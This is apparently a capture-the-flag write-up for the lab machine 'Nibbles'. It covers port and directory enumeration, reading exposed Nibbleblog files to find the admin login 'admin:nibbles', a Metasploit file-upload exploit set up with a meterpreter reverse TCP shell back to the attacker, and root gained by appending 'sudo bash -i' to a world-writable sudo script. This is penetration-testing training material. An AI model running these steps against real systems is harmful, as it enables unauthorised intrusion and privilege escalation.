Nibbles - CSPSec

![[Nibbles.png]] # **Nmap Results** ```bash # Replace <target_ip> and <target_domain> echo -e "\ntarget_ip=10.129.13.53\ntarget_domain=nibbles.htb" | tee -a ~/.bashrc exec bash echo "$target_ip $target_domain" | sudo tee -a /etc/hosts mkdir -p $target_domain/nmap && cd $target_domain # Scan all TCP ports sudo nmap -sC -sV -oA nmap/full.tcp -p- $target_ip -vv # Scan top 1000 UDP ports sudo nmap -sU -oA nmap/initial.udp $target_ip -vv # Scan top 100 UDP ports using a faster timing template sudo nmap -sU -oA nmap/initial.udp -T4 -F $target_ip -vv ``` ```text Nmap scan report for nibbles.htb (10.129.13.53) Host is up, received echo-reply ttl 63 (0.064s latency). Scanned at 2025-11-09 20:06:54 UTC for 51997s Not shown: 65515 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc= | 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 3572/tcp filtered megaregsvrport no-response 6395/tcp filtered unknown no-response 7185/tcp filtered unknown no-response 17777/tcp filtered sw-orion no-response 20179/tcp filtered unknown no-response 21161/tcp filtered unknown no-response 26078/tcp filtered unknown no-response 31780/tcp filtered unknown no-response 35862/tcp filtered unknown no-response 41391/tcp filtered unknown no-response 42250/tcp filtered unknown no-response 42829/tcp filtered unknown no-response 44243/tcp filtered unknown no-response 49212/tcp filtered unknown no-response 56885/tcp filtered unknown no-response 58658/tcp filtered unknown no-response 61219/tcp filtered unknown no-response 65330/tcp filtered unknown no-response Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Nov 10 10:33:31 2025 -- 1 IP address (1 host up) scanned in 51997.72 seconds ``` # **Service Enumeration** ## **TCP/80** ### **Directory Brute Force** Performing an initial directory brute force search did not reveal any results. ```bash gobuster dir -u http://$target_domain -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt ``` ``` =============================================================== Gobuster v3.8 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://nibbles.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.8 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 290] /.htaccess (Status: 403) [Size: 295] /.htpasswd (Status: 403) [Size: 295] /index.html (Status: 200) [Size: 93] /server-status (Status: 403) [Size: 299] Progress: 4746 / 4746 (100.00%) =============================================================== Finished =============================================================== ``` Examining the source code of `index.html` revealed a non-standard directory. ```bash curl http://$target_domain ``` ``` <b>Hello world!</b>  ``` Doing a directory brute force on `/nibbleblog` revealed a lot more information that had to be parsed. ```bash gobuster dir -u http://$target_domain/nibbleblog -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt ``` ``` =============================================================== Gobuster v3.8 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://nibbles.htb/nibbleblog [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.8 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.htpasswd (Status: 403) [Size: 306] /.htaccess (Status: 403) [Size: 306] /.hta (Status: 403) [Size: 301] /README (Status: 200) [Size: 4628] /admin (Status: 301) [Size: 321] [--> http://nibbles.htb/nibbleblog/admin/] /admin.php (Status: 200) [Size: 1401] /content (Status: 301) [Size: 323] [--> http://nibbles.htb/nibbleblog/content/] /index.php (Status: 200) [Size: 2987] /languages (Status: 301) [Size: 325] [--> http://nibbles.htb/nibbleblog/languages/] /plugins (Status: 301) [Size: 323] [--> http://nibbles.htb/nibbleblog/plugins/] /themes (Status: 301) [Size: 322] [--> http://nibbles.htb/nibbleblog/themes/] Progress: 4746 / 4746 (100.00%) =============================================================== Finished =============================================================== ``` ### **Nibbleblog** One of the things identified was a login page (`http://nibbles.htb/nibbleblog/admin.php`). I attempted to log in with common usernames and passwords, but that did not work. ![[Nibbles - Login Page.png]] Software and version information were found in the `README`. ```bash curl http://nibbles.htb/nibbleblog/README ``` ``` ====== Nibbleblog ====== Version: v4.0.3 Codename: Coffee Release date: 2014-04-01 Site: http://www.nibbleblog.com Blog: http://blog.nibbleblog.com Help & Support: http://forum.nibbleblog.com Documentation: http://docs.nibbleblog.com ``` # **Exploit** ## **Nibbleblog File Upload Vulnerability** Based on the software version, I identified a vulnerability that allows an authenticated user to upload arbitrary files. ```bash searchsploit nibbleblog ``` ## **Finding Valid Credentials** All that was needed was to find valid credentials. Based on the directory brute force results, I began manual enumeration. Within the `/content/private` directory, I found a valid username, `admin`. ```bash curl http://nibbles.htb/nibbleblog/content/private/users.xml | xmllint --format - ``` ``` <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <users> <user username="admin"> <id type="integer">0</id> <session_fail_count type="integer">0</session_fail_count> <session_date type="integer">1514544131</session_date> </user> <blacklist type="string" ip="10.10.10.1"> <date type="integer">1512964659</date> <fail_count type="integer">1</fail_count> </blacklist> </users> ``` Upon reviewing other files, I found multiple references to the term `nibbles`. Sure enough, I was able to log in with the credentials `admin::nibbles`. ```bash curl http://nibbles.htb/nibbleblog/content/private/config.xml | xmllint --format - ``` ``` <?xml version="1.0" encoding="utf-8" standalone="yes"?> <config> <name type="string">Nibbles</name> <slogan type="string">Yum yum</slogan> <footer type="string">Powered by Nibbleblog</footer> <advanced_post_options type="integer">0</advanced_post_options> <url type="string">http://10.10.10.134/nibbleblog/</url> <path type="string">/nibbleblog/</path> <items_rss type="integer">4</items_rss> <items_page type="integer">6</items_page> <language type="string">en_US</language> <timezone type="string">UTC</timezone> <timestamp_format type="string">%d %B, %Y</timestamp_format> <locale type="string">en_US</locale> <img_resize type="integer">1</img_resize> <img_resize_width type="integer">1000</img_resize_width> <img_resize_height type="integer">600</img_resize_height> <img_resize_quality type="integer">100</img_resize_quality> <img_resize_option type="string">auto</img_resize_option> <img_thumbnail type="integer">1</img_thumbnail> <img_thumbnail_width type="integer">190</img_thumbnail_width> <img_thumbnail_height type="integer">190</img_thumbnail_height> <img_thumbnail_quality type="integer">100</img_thumbnail_quality> <img_thumbnail_option type="string">landscape</img_thumbnail_option> <theme type="string">simpler</theme> <notification_comments type="integer">1</notification_comments> <notification_session_fail type="integer">0</notification_session_fail> <notification_session_start type="integer">0</notification_session_start> <notification_email_to type="string">[email protected]</notification_email_to> <notification_email_from type="string">[email protected]</notification_email_from> <seo_site_title type="string">Nibbles - Yum yum</seo_site_title> <seo_site_description type="string"/> <seo_keywords type="string"/> <seo_robots type="string"/> <seo_google_code type="string"/> <seo_bing_code type="string"/> <seo_author type="string"/> <friendly_urls type="integer">0</friendly_urls> <default_homepage type="integer">0</default_homepage> </config> ``` ![[Nibbles - Dashboard.png]] ## **Exploiting the Vulnerability** With the help of `msfconsole`, I was able to exploit the target with ease. ``` msf exploit(multi/http/nibbleblog_file_upload) > options Module options (exploit/multi/http/nibbleblog_file_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD nibbles yes The password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http RHOSTS 10.129.13.53 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /nibbleblog yes The base path to the web application USERNAME admin yes The username to authenticate with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.14.61 yes The listen address (an interface may be specified) LPORT 45753 yes The listen port Exploit target: Id Name -- ---- 0 Nibbleblog 4.0.3 ``` # **Privilege Escalation** ## **Abusing `sudo` and Weak File Permissions** One of the first checks performed was to determine what the current user can run with `sudo`. ```bash sudo -l ``` ``` Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh ``` I attempted to `ls` the file `/home/nibbler/personal/stuff/monitor.sh` but it did not reside on disk. ```bash ls -latr /home/nibbler/personal/stuff/monitor.sh ``` ``` ls: cannot access '/home/nibbler/personal/stuff/monitor.sh': No such file or directory ``` Looking in the user's home directory, I found a ZIP file of interest. After extracting its contents I was able to view `/home/nibbler/personal/stuff/monitor.sh`. ```bash ls -latr /home/nibbler ``` ``` total 28 drwxr-xr-x 3 root root 4096 Dec 10 2017 .. drwxrwxr-x 2 nibbler nibbler 4096 Dec 10 2017 .nano -r-------- 1 nibbler nibbler 1855 Dec 10 2017 personal.zip -rw------- 1 nibbler nibbler 0 Dec 29 2017 .bash_history -r-------- 1 nibbler nibbler 33 Nov 9 15:05 user.txt drwxr-x--- 3 nibbler nibbler 4096 Nov 9 16:50 .config drwxr-xr-x 5 nibbler nibbler 4096 Nov 9 16:51 . drwx------ 2 nibbler nibbler 4096 Nov 9 16:51 .gnupg ``` ```bash unzip /home/nibbler/personal.zip ``` ``` Archive: /home/nibbler/personal.zip creating: personal/ creating: personal/stuff/ inflating: personal/stuff/monitor.sh ``` Upon reviewing the file permissions, I noticed that the current user had the necessary rights to edit it. ```bash ls -latr /home/nibbler/personal/stuff/monitor.sh ``` ``` -rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 /home/nibbler/personal/stuff/monitor.sh ``` After making a backup of the file, I made a quick edit and ran it with `sudo`. And just like that, I had root-level access. ```bash cp /home/nibbler/personal/stuff/monitor.sh /home/nibbler/personal/stuff/monitor.sh.bak echo 'sudo bash -i' >> /home/nibbler/personal/stuff/monitor.sh sudo /home/nibbler/personal/stuff/monitor.sh ``` # **References** - [Nibbleblog File Upload Vulnerability](https://www.rapid7.com/db/modules/exploit/multi/http/nibbleblog_file_upload/)